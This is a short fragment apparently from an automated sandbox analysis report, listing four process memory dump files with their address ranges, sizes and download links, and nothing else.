memory/4128-11-0x0000026131C00000-0x0000026131C22000-memory.dmp

Filesize
136KB

Download
memory/4128-121-0x00007FF80D4A0000-0x00007FF80DF61000-memory.dmp

Filesize
10.8MB

Download
memory/5436-113-0x00000235C1130000-0x00000235C1144000-memory.dmp

Filesize
80KB

Download
memory/5436-38-0x00000235C10B0000-0x00000235C10C6000-memory.dmp

Filesize
88KB

Download